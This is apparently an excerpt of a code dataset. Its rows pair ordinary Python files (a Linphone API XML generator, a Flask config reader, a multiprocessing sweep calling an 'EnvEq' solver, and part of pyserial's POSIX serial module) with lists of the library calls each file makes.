''.join(argNode.find('./type').itertext())\n\t\t\targName = ''\n\t\t\targNameNode = argNode.find('./declname')\n\t\t\tif argNameNode is not None:\n\t\t\t\targName = ''.join(argNameNode.itertext())\n\t\t\tif argType != 'void':\n\t\t\t\targslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))\n\t\tif len(argslist) > 0:\n\t\t\tparamdescs = node.findall(\"./detaileddescription/para/parameterlist[@kind='param']/parameteritem\")\n\t\t\tif paramdescs:\n\t\t\t\tfor arg 
in argslist.arguments:\n\t\t\t\t\tfor paramdesc in paramdescs:\n\t\t\t\t\t\tif arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:\n\t\t\t\t\t\t\tif arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t':\n\t\t\t\t\t\t\t\tn = paramdesc.find('.//bctbxlist')\n\t\t\t\t\t\t\t\tif n is not None:\n\t\t\t\t\t\t\t\t\targ.containedType = n.text\n\t\t\t\t\t\t\targ.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))\n\t\t\t\tmissingDocWarning = ''\n\t\t\t\tfor arg in argslist.arguments:\n\t\t\t\t\tif arg.description == None:\n\t\t\t\t\t\tmissingDocWarning += \"\\t'\" + arg.name + \"' parameter not documented\\n\";\n\t\tf = CFunction(name, returnarg, argslist)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\tf.deprecated = True\n\t\tf.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\tf.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\tf.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\tif f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '':\n\t\t\treturn None\n\t\tlocationNode = node.find('./location')\n\t\tif locationNode is not None:\n\t\t\tf.location = locationNode.get('file')\n\t\t\tif not f.location.endswith('.h'):\n\t\t\t\tmissingDocWarning += \"\\tNot documented in a header file ('\" + f.location + \"')\\n\";\n\t\tif missingDocWarning != '':\n\t\t\tprint(name + \":\\n\" + missingDocWarning)\n\t\treturn f\n\n\tdef __findCFunction(self, tree):\n\t\tmemberdefs = tree.findall(\"./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']\")\n\t\tfor m in memberdefs:\n\t\t\tf = self.__parseCFunctionMemberdef(m)\n\t\t\tif f is not None:\n\t\t\t\tself.add(f)\n\n\tdef initFromFiles(self, xmlfiles):\n\t\ttrees = []\n\t\tfor f in xmlfiles:\n\t\t\ttree = None\n\t\t\ttry:\n\t\t\t\tif self.verbose:\n\t\t\t\t\tprint(\"Parsing XML file: \" + f.name)\n\t\t\t\ttree = ET.parse(f)\n\t\t\texcept ET.ParseError as e:\n\t\t\t\tprint(e)\n\t\t\tif tree is not None:\n\t\t\t\ttrees.append(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCEnum(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCStruct(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCTypedef(tree)\n\t\tfor tree in trees:\n\t\t\tself.__findCFunction(tree)\n\t\tself.__discoverClasses()\n\n\tdef initFromDir(self, xmldir):\n\t\tfiles = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ]\n\t\tself.initFromFiles(files)\n\n\tdef check(self):\n\t\tfor c in self.classes:\n\t\t\tfor name, p in six.iteritems(c.properties):\n\t\t\t\tif p.getter is None and p.setter is not None:\n\t\t\t\t\tprint(\"Property '\" + name + \"' of class '\" + c.name + \"' has a setter but no getter\")\n\n\nclass Generator:\n\tdef __init__(self, outputfile):\n\t\tself.__outputfile = outputfile\n\n\tdef __generateEnum(self, cenum, enumsNode):\n\t\tenumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() }\n\t\tif cenum.associatedTypedef is not None:\n\t\t\tenumNodeAttributes['name'] = cenum.associatedTypedef.name\n\t\tenumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes)\n\t\tif cenum.briefDescription != '':\n\t\t\tenumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription')\n\t\t\tenumBriefDescriptionNode.text = 
cenum.briefDescription\n\t\tenumNode.append(cenum.detailedDescription)\n\t\tif len(cenum.values) > 0:\n\t\t\tenumValuesNode = ET.SubElement(enumNode, 'values')\n\t\t\tfor value in cenum.values:\n\t\t\t\tenumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() }\n\t\t\t\tvalueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes)\n\t\t\t\tif value.briefDescription != '':\n\t\t\t\t\tvalueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription')\n\t\t\t\t\tvalueBriefDescriptionNode.text = value.briefDescription\n\t\t\t\tvalueNode.append(value.detailedDescription)\n\n\tdef __generateFunction(self, parentNode, nodeName, f):\n\t\tfunctionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() }\n\t\tif f.location is not None:\n\t\t\tfunctionAttributes['location'] = f.location\n\t\tfunctionNode = ET.SubElement(parentNode, nodeName, functionAttributes)\n\t\treturnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType }\n\t\tif f.returnArgument.containedType is not None:\n\t\t\treturnValueAttributes['containedtype'] = f.returnArgument.containedType\n\t\treturnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes)\n\t\tif f.returnArgument.description is not None:\n\t\t\treturnValueNode.append(f.returnArgument.description)\n\t\targumentsNode = ET.SubElement(functionNode, 'arguments')\n\t\tfor arg in f.arguments:\n\t\t\targumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType }\n\t\t\tif arg.containedType is not None:\n\t\t\t\targumentNodeAttributes['containedtype'] = arg.containedType\n\t\t\targumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes)\n\t\t\tif arg.description is not None:\n\t\t\t\targumentNode.append(arg.description)\n\t\tif f.briefDescription != '':\n\t\t\tfunctionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription')\n\t\t\tfunctionBriefDescriptionNode.text = f.briefDescription\n\t\tfunctionNode.append(f.detailedDescription)\n\n\tdef __generateClass(self, cclass, classesNode):\n\t\t# Do not include classes that contain nothing\n\t\tif len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \\\n\t\t\tlen(cclass.instanceMethods) == 0 and len(cclass.properties) == 0:\n\t\t\treturn\n\t\t# Check the capabilities of the class\n\t\thas_ref_method = False\n\t\thas_unref_method = False\n\t\thas_destroy_method = False\n\t\tfor methodname in cclass.instanceMethods:\n\t\t\tmethodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '')\n\t\t\tif methodname_without_prefix == 'ref':\n\t\t\t\thas_ref_method = True\n\t\t\telif methodname_without_prefix == 'unref':\n\t\t\t\thas_unref_method = True\n\t\t\telif methodname_without_prefix == 'destroy':\n\t\t\t\thas_destroy_method = True\n\t\trefcountable = False\n\t\tdestroyable = False\n\t\tif has_ref_method and has_unref_method:\n\t\t\trefcountable = True\n\t\tif has_destroy_method:\n\t\t\tdestroyable = True\n\t\tclassNodeAttributes = {\n\t\t\t'name' : cclass.name,\n\t\t\t'cfunctionprefix' : cclass.cFunctionPrefix,\n\t\t\t'deprecated' : str(cclass.deprecated).lower(),\n\t\t\t'refcountable' : str(refcountable).lower(),\n\t\t\t'destroyable' : str(destroyable).lower()\n\t\t}\n\t\t# Generate the XML node for the class\n\t\tclassNode = ET.SubElement(classesNode, 'class', classNodeAttributes)\n\t\tif len(cclass.events) > 0:\n\t\t\teventsNode = ET.SubElement(classNode, 'events')\n\t\t\teventnames = []\n\t\t\tfor 
eventname in cclass.events:\n\t\t\t\teventnames.append(eventname)\n\t\t\teventnames.sort()\n\t\t\tfor eventname in eventnames:\n\t\t\t\tself.__generateFunction(eventsNode, 'event', cclass.events[eventname])\n\t\tif len(cclass.classMethods) > 0:\n\t\t\tclassMethodsNode = ET.SubElement(classNode, 'classmethods')\n\t\t\tmethodnames = []\n\t\t\tfor methodname in cclass.classMethods:\n\t\t\t\tmethodnames.append(methodname)\n\t\t\tmethodnames.sort()\n\t\t\tfor methodname in methodnames:\n\t\t\t\tself.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname])\n\t\tif len(cclass.instanceMethods) > 0:\n\t\t\tinstanceMethodsNode = ET.SubElement(classNode, 'instancemethods')\n\t\t\tmethodnames = []\n\t\t\tfor methodname in cclass.instanceMethods:\n\t\t\t\tmethodnames.append(methodname)\n\t\t\tmethodnames.sort()\n\t\t\tfor methodname in methodnames:\n\t\t\t\tself.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname])\n\t\tif len(cclass.properties) > 0:\n\t\t\tpropertiesNode = ET.SubElement(classNode, 'properties')\n\t\t\tpropnames = []\n\t\t\tfor propname in cclass.properties:\n\t\t\t\tpropnames.append(propname)\n\t\t\tpropnames.sort()\n\t\t\tfor propname in propnames:\n\t\t\t\tpropertyNodeAttributes = { 'name' : propname }\n\t\t\t\tpropertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes)\n\t\t\t\tif cclass.properties[propname].getter is not None:\n\t\t\t\t\tself.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter)\n\t\t\t\tif cclass.properties[propname].setter is not None:\n\t\t\t\t\tself.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter)\n\t\tif cclass.briefDescription != '':\n\t\t\tclassBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription')\n\t\t\tclassBriefDescriptionNode.text = cclass.briefDescription\n\t\tclassNode.append(cclass.detailedDescription)\n\n\tdef generate(self, project):\n\t\tprint(\"Generating XML document of Linphone API to '\" + self.__outputfile.name + \"'\")\n\t\tapiNode = ET.Element('api')\n\t\tproject.enums.sort(key = lambda e: e.name)\n\t\tif len(project.enums) > 0:\n\t\t\tenumsNode = ET.SubElement(apiNode, 'enums')\n\t\t\tfor cenum in project.enums:\n\t\t\t\tself.__generateEnum(cenum, enumsNode)\n\t\tif len(project.classes) > 0:\n\t\t\tclassesNode = ET.SubElement(apiNode, 'classes')\n\t\t\tproject.classes.sort(key = lambda c: c.name)\n\t\t\tfor cclass in project.classes:\n\t\t\t\tself.__generateClass(cclass, classesNode)\n\t\ts = '\\n'.encode('utf-8')\n\t\ts += ET.tostring(apiNode, 'utf-8')\n\t\tif project.prettyPrint:\n\t\t\ts = minidom.parseString(s).toprettyxml(indent='\\t')\n\t\tself.__outputfile.write(s)\n\n\n\ndef main(argv = None):\n\tif argv is None:\n\t\targv = sys.argv\n\targparser = argparse.ArgumentParser(description=\"Generate XML version of the Linphone API.\")\n\targparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help=\"Output XML file describing the Linphone API.\")\n\targparser.add_argument('--verbose', help=\"Increase output verbosity\", action='store_true')\n\targparser.add_argument('--pretty', help=\"XML pretty print\", action='store_true')\n\targparser.add_argument('xmldir', help=\"XML directory generated by doxygen.\")\n\targs = argparser.parse_args()\n\tif args.outputfile == None:\n\t\targs.outputfile = open('api.xml', 'w')\n\tproject = Project()\n\tif args.verbose:\n\t\tproject.verbose = True\n\tif args.pretty:\n\t\tproject.prettyPrint = 
True\n\tproject.initFromDir(args.xmldir)\n\tproject.check()\n\tgen = Generator(args.outputfile)\n\tgen.generate(project)\n\nif __name__ == \"__main__\":\n\tsys.exit(main())\n"},"apis":{"kind":"list like","value":["argparse.FileType","os.listdir","xml.etree.ElementTree.parse","argparse.ArgumentParser","metadoc.Parser","xml.etree.ElementTree.tostring","os.path.join","xml.etree.ElementTree.Element","xml.dom.minidom.parseString","xml.etree.ElementTree.SubElement","six.iteritems"],"string":"[\n \"argparse.FileType\",\n \"os.listdir\",\n \"xml.etree.ElementTree.parse\",\n \"argparse.ArgumentParser\",\n \"metadoc.Parser\",\n \"xml.etree.ElementTree.tostring\",\n \"os.path.join\",\n \"xml.etree.ElementTree.Element\",\n \"xml.dom.minidom.parseString\",\n \"xml.etree.ElementTree.SubElement\",\n \"six.iteritems\"\n]"},"extract_api":{"kind":"string","value":"[((27754, 27839), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '\"\"\"Generate XML version of the Linphone API.\"\"\"'}), \"(description='Generate XML version of the Linphone API.'\\n )\\n\", (27777, 27839), False, 'import argparse\\n'), ((6873, 6889), 'metadoc.Parser', 'metadoc.Parser', ([], {}), '()\\n', (6887, 6889), False, 'import metadoc\\n'), ((21658, 21710), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumsNode', '\"\"\"enum\"\"\"', 'enumNodeAttributes'], {}), \"(enumsNode, 'enum', enumNodeAttributes)\\n\", (21671, 21710), True, 'import xml.etree.ElementTree as ET\\n'), ((22676, 22731), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['parentNode', 'nodeName', 'functionAttributes'], {}), '(parentNode, nodeName, functionAttributes)\\n', (22689, 22731), True, 'import xml.etree.ElementTree as ET\\n'), ((22986, 23046), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '\"\"\"return\"\"\"', 'returnValueAttributes'], {}), \"(functionNode, 'return', returnValueAttributes)\\n\", (22999, 23046), True, 'import xml.etree.ElementTree as ET\\n'), ((23168, 23208), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '\"\"\"arguments\"\"\"'], {}), \"(functionNode, 'arguments')\\n\", (23181, 23208), True, 'import xml.etree.ElementTree as ET\\n'), ((24979, 25035), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classesNode', '\"\"\"class\"\"\"', 'classNodeAttributes'], {}), \"(classesNode, 'class', classNodeAttributes)\\n\", (24992, 25035), True, 'import xml.etree.ElementTree as ET\\n'), ((27044, 27061), 'xml.etree.ElementTree.Element', 'ET.Element', (['\"\"\"api\"\"\"'], {}), \"('api')\\n\", (27054, 27061), True, 'import xml.etree.ElementTree as ET\\n'), ((27539, 27568), 'xml.etree.ElementTree.tostring', 'ET.tostring', (['apiNode', '\"\"\"utf-8\"\"\"'], {}), \"(apiNode, 'utf-8')\\n\", (27550, 27568), True, 'import xml.etree.ElementTree as ET\\n'), ((20936, 20959), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\\n', (20948, 20959), False, 'import os\\n'), ((21148, 21175), 'six.iteritems', 'six.iteritems', (['c.properties'], {}), '(c.properties)\\n', (21161, 21175), False, 'import six\\n'), ((21776, 21819), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '\"\"\"briefdescription\"\"\"'], {}), \"(enumNode, 'briefdescription')\\n\", (21789, 21819), True, 'import xml.etree.ElementTree as ET\\n'), ((21971, 22004), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '\"\"\"values\"\"\"'], {}), \"(enumNode, 'values')\\n\", (21984, 22004), True, 'import xml.etree.ElementTree as ET\\n'), ((23459, 23523), 
'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['argumentsNode', '\"\"\"argument\"\"\"', 'argumentNodeAttributes'], {}), \"(argumentsNode, 'argument', argumentNodeAttributes)\\n\", (23472, 23523), True, 'import xml.etree.ElementTree as ET\\n'), ((23665, 23712), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '\"\"\"briefdescription\"\"\"'], {}), \"(functionNode, 'briefdescription')\\n\", (23678, 23712), True, 'import xml.etree.ElementTree as ET\\n'), ((25081, 25115), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"events\"\"\"'], {}), \"(classNode, 'events')\\n\", (25094, 25115), True, 'import xml.etree.ElementTree as ET\\n'), ((25388, 25428), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"classmethods\"\"\"'], {}), \"(classNode, 'classmethods')\\n\", (25401, 25428), True, 'import xml.etree.ElementTree as ET\\n'), ((25739, 25782), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"instancemethods\"\"\"'], {}), \"(classNode, 'instancemethods')\\n\", (25752, 25782), True, 'import xml.etree.ElementTree as ET\\n'), ((26095, 26133), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"properties\"\"\"'], {}), \"(classNode, 'properties')\\n\", (26108, 26133), True, 'import xml.etree.ElementTree as ET\\n'), ((26762, 26806), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '\"\"\"briefdescription\"\"\"'], {}), \"(classNode, 'briefdescription')\\n\", (26775, 26806), True, 'import xml.etree.ElementTree as ET\\n'), ((27151, 27182), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '\"\"\"enums\"\"\"'], {}), \"(apiNode, 'enums')\\n\", (27164, 27182), True, 'import xml.etree.ElementTree as ET\\n'), ((27304, 27337), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '\"\"\"classes\"\"\"'], {}), \"(apiNode, 'classes')\\n\", (27317, 27337), True, 'import xml.etree.ElementTree as ET\\n'), ((27908, 27930), 'argparse.FileType', 'argparse.FileType', (['\"\"\"w\"\"\"'], {}), \"('w')\\n\", (27925, 27930), False, 'import argparse\\n'), ((20565, 20576), 'xml.etree.ElementTree.parse', 'ET.parse', (['f'], {}), '(f)\\n', (20573, 20576), True, 'import xml.etree.ElementTree as ET\\n'), ((20969, 20987), 'os.listdir', 'os.listdir', (['xmldir'], {}), '(xmldir)\\n', (20979, 20987), False, 'import os\\n'), ((22152, 22216), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumValuesNode', '\"\"\"value\"\"\"', 'enumValuesNodeAttributes'], {}), \"(enumValuesNode, 'value', enumValuesNodeAttributes)\\n\", (22165, 22216), True, 'import xml.etree.ElementTree as ET\\n'), ((26341, 26406), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['propertiesNode', '\"\"\"property\"\"\"', 'propertyNodeAttributes'], {}), \"(propertiesNode, 'property', propertyNodeAttributes)\\n\", (26354, 26406), True, 'import xml.etree.ElementTree as ET\\n'), ((22287, 22331), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['valueNode', '\"\"\"briefdescription\"\"\"'], {}), \"(valueNode, 'briefdescription')\\n\", (22300, 22331), True, 'import xml.etree.ElementTree as ET\\n'), ((27602, 27624), 'xml.dom.minidom.parseString', 'minidom.parseString', (['s'], {}), '(s)\\n', (27621, 27624), True, 'import xml.dom.minidom as minidom\\n'), ((21007, 21030), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\\n', (21019, 21030), False, 'import os\\n')]"}}},{"rowIdx":715,"cells":{"code":{"kind":"string","value":"import configparser\nimport 
os\n\n\n\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndir_path += '/cfg.ini'\n\nclass Configuration(object):\n def __init__(self,debug=False):\n section = \"Flask-debug\" if debug else \"Flask\"\n \n cfg = configparser.ConfigParser()\n cfg.read(dir_path if debug else \"/var/www/html/flaskApp/cfg.ini\")\n self.debug = cfg.getboolean(section, \"DEBUG\")\n self.csrf_enabled = cfg.getboolean(section,\"CSRF_ENABLED\")\n self.threads_per_page = cfg.getint(section,\"THREADS_PER_PAGE\")\n self.port = cfg.getint(section,\"PORT\")\n self.host = cfg.get(section,\"HOST\")\n"},"apis":{"kind":"list like","value":["os.path.realpath","configparser.ConfigParser"],"string":"[\n \"os.path.realpath\",\n \"configparser.ConfigParser\"\n]"},"extract_api":{"kind":"string","value":"[((62, 88), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\\n', (78, 88), False, 'import os\\n'), ((256, 283), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\\n', (281, 283), False, 'import configparser\\n')]"}}},{"rowIdx":716,"cells":{"code":{"kind":"string","value":"from multiprocessing import Pool\nimport EnvEq as ee\nimport numpy as np\nimport itertools as it\nimport os\n\n#parsing input into numpy arrays\nfrom input import *\ny0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])\np=np.array([p_o2,p_test])\nmu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])\nlam=np.array([lam_o2,lam_test])\nt_D=np.array([t_DTpos,t_DTpro,t_DTneg])\nr=np.array([r_Tpos,r_Tpro,r_Tneg])\ndelta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])\nrho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])\nlim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)\n\n#make directories for saving raw_outputs\ntry:\n os.makedirs(\"../../raw_output/EnvEq/\"+f_name)\nexcept:\n pass\n\n#iterator over these \no2_lim_arr=np.empty([0,2])\nfor ulim_Tpro in np.arange(0.1,1,0.2):\n for ulim_Tneg in np.arange(0.1,1,0.2):\n o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)\n\n\ndef solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim\n f_name_i=f_name+\"{:.1f}\".format(u_lim_o2[0])+\"-\"+\"{:.1f}\".format(u_lim_o2[1])\n lim[0,1,1]=u_lim_o2[0]\n lim[0,2,1]=u_lim_o2[1]\n ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)\n\nif __name__ == '__main__':\n pool = Pool(4)\n pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims\n pool.close()\n pool.join()\n"},"apis":{"kind":"list like","value":["EnvEq.solve_eq","os.makedirs","numpy.append","numpy.array","numpy.empty","multiprocessing.Pool","numpy.arange"],"string":"[\n \"EnvEq.solve_eq\",\n \"os.makedirs\",\n \"numpy.append\",\n \"numpy.array\",\n \"numpy.empty\",\n \"multiprocessing.Pool\",\n \"numpy.arange\"\n]"},"extract_api":{"kind":"string","value":"[((161, 214), 'numpy.array', 'np.array', (['[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'], {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])\\n', (169, 214), True, 'import numpy as np\\n'), ((213, 237), 'numpy.array', 'np.array', (['[p_o2, p_test]'], {}), '([p_o2, p_test])\\n', (221, 237), True, 'import numpy as np\\n'), ((240, 316), 'numpy.array', 'np.array', (['[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'], {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])\\n', (248, 316), True, 'import numpy as np\\n'), ((316, 344), 'numpy.array', 'np.array', (['[lam_o2, 
lam_test]'], {}), '([lam_o2, lam_test])\\n', (324, 344), True, 'import numpy as np\\n'), ((348, 385), 'numpy.array', 'np.array', (['[t_DTpos, t_DTpro, t_DTneg]'], {}), '([t_DTpos, t_DTpro, t_DTneg])\\n', (356, 385), True, 'import numpy as np\\n'), ((386, 420), 'numpy.array', 'np.array', (['[r_Tpos, r_Tpro, r_Tneg]'], {}), '([r_Tpos, r_Tpro, r_Tneg])\\n', (394, 420), True, 'import numpy as np\\n'), ((425, 471), 'numpy.array', 'np.array', (['[delta_Tpos, delta_Tpro, delta_Tneg]'], {}), '([delta_Tpos, delta_Tpro, delta_Tneg])\\n', (433, 471), True, 'import numpy as np\\n'), ((474, 514), 'numpy.array', 'np.array', (['[rho_Tpos, rho_Tpro, rho_Tneg]'], {}), '([rho_Tpos, rho_Tpro, rho_Tneg])\\n', (482, 514), True, 'import numpy as np\\n'), ((517, 725), 'numpy.array', 'np.array', (['[[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [l_lim_o2Tneg,\\n u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [l_lim_testTpro,\\n u_lim_testTpro], [0, 0]]]'], {'dtype': 'np.float64'}), '([[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [\\n l_lim_o2Tneg, u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [\\n l_lim_testTpro, u_lim_testTpro], [0, 0]]], dtype=np.float64)\\n', (525, 725), True, 'import numpy as np\\n'), ((852, 868), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\\n', (860, 868), True, 'import numpy as np\\n'), ((885, 907), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\\n', (894, 907), True, 'import numpy as np\\n'), ((755, 802), 'os.makedirs', 'os.makedirs', ([\"('../../raw_output/EnvEq/' + f_name)\"], {}), \"('../../raw_output/EnvEq/' + f_name)\\n\", (766, 802), False, 'import os\\n'), ((928, 950), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\\n', (937, 950), True, 'import numpy as np\\n'), ((1261, 1332), 'EnvEq.solve_eq', 'ee.solve_eq', (['t_max', 'dt', 'y0', 'p', 'mu', 'lam', 'r', 'K', 'delta', 'rho', 'lim', 'f_name_i'], {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)\\n', (1272, 1332), True, 'import EnvEq as ee\\n'), ((1361, 1368), 'multiprocessing.Pool', 'Pool', (['(4)'], {}), '(4)\\n', (1365, 1368), False, 'from multiprocessing import Pool\\n'), ((969, 1024), 'numpy.append', 'np.append', (['o2_lim_arr', '[[ulim_Tpro, ulim_Tneg]]'], {'axis': '(0)'}), '(o2_lim_arr, [[ulim_Tpro, ulim_Tneg]], axis=0)\\n', (978, 1024), True, 'import numpy as np\\n')]"}}},{"rowIdx":717,"cells":{"code":{"kind":"string","value":"#!/usr/bin/env python\n#\n# Python Serial Port Extension for Win32, Linux, BSD, Jython\n# module for serial IO for POSIX compatible systems, like Linux\n# see __init__.py\n#\n# (C) 2001-2010 <>\n# this is distributed under a free software license, see license.txt\n#\n# parts based on code from <>:\n# ftp://ftp.visi.com/users/grante/python/PosixSerial.py\n#\n# references: http://www.easysw.com/~mike/serial/serial.html\n\nimport sys, os, fcntl, termios, struct, select, errno, time\nfrom .serialutil import *\n\n# Do check the Python version as some constants have moved.\nif (sys.hexversion < 0x020100f0):\n import TERMIOS\nelse:\n TERMIOS = termios\n\nif (sys.hexversion < 0x020200f0):\n import FCNTL\nelse:\n FCNTL = fcntl\n\n# try to detect the OS so that a device can be selected...\n# this code block should supply a device() and set_special_baudrate() function\n# for the platform\nplat = sys.platform.lower()\n\nif plat[:5] == 'linux': # Linux (confirmed)\n\n def device(port):\n return '/dev/ttyS%d' % port\n\n ASYNC_SPD_MASK = 0x1030\n ASYNC_SPD_CUST = 0x0030\n\n def 
set_special_baudrate(port, baudrate):\n import array\n buf = array.array('i', [0] * 32)\n\n # get serial_struct\n FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf)\n\n # set custom divisor\n buf[6] = buf[7] / baudrate\n\n # update flags\n buf[4] &= ~ASYNC_SPD_MASK\n buf[4] |= ASYNC_SPD_CUST\n\n # set serial_struct\n try:\n res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf)\n except IOError:\n raise ValueError('Failed to set custom baud rate: %r' % baudrate)\n\n baudrate_constants = {\n 0: 0000000, # hang up\n 50: 0o000001,\n 75: 0o000002,\n 110: 0o000003,\n 134: 0o000004,\n 150: 0o000005,\n 200: 0o000006,\n 300: 0o000007,\n 600: 0o000010,\n 1200: 0o000011,\n 1800: 0o000012,\n 2400: 0o000013,\n 4800: 0o000014,\n 9600: 0o000015,\n 19200: 0o000016,\n 38400: 0o000017,\n 57600: 0o010001,\n 115200: 0o010002,\n 230400: 0o010003,\n 460800: 0o010004,\n 500000: 0o010005,\n 576000: 0o010006,\n 921600: 0o010007,\n 1000000: 0o010010,\n 1152000: 0o010011,\n 1500000: 0o010012,\n 2000000: 0o010013,\n 2500000: 0o010014,\n 3000000: 0o010015,\n 3500000: 0o010016,\n 4000000: 0o010017\n }\n\nelif plat == 'cygwin': # cygwin/win32 (confirmed)\n\n def device(port):\n return '/dev/com%d' % (port + 1)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat == 'openbsd3': # BSD (confirmed)\n\n def device(port):\n return '/dev/ttyp%d' % port\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:3] == 'bsd' or \\\n plat[:7] == 'freebsd' or \\\n plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d)\n\n def device(port):\n return '/dev/cuad%d' % port\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:6] == 'darwin': # OS X\n\n version = os.uname()[2].split('.')\n # Tiger or above can support arbitrary serial speeds\n if int(version[0]) >= 8:\n def set_special_baudrate(port, baudrate):\n # use IOKit-specific call to set up high speeds\n import array, fcntl\n buf = array.array('i', [baudrate])\n IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t)\n fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1)\n else: # version < 8\n def 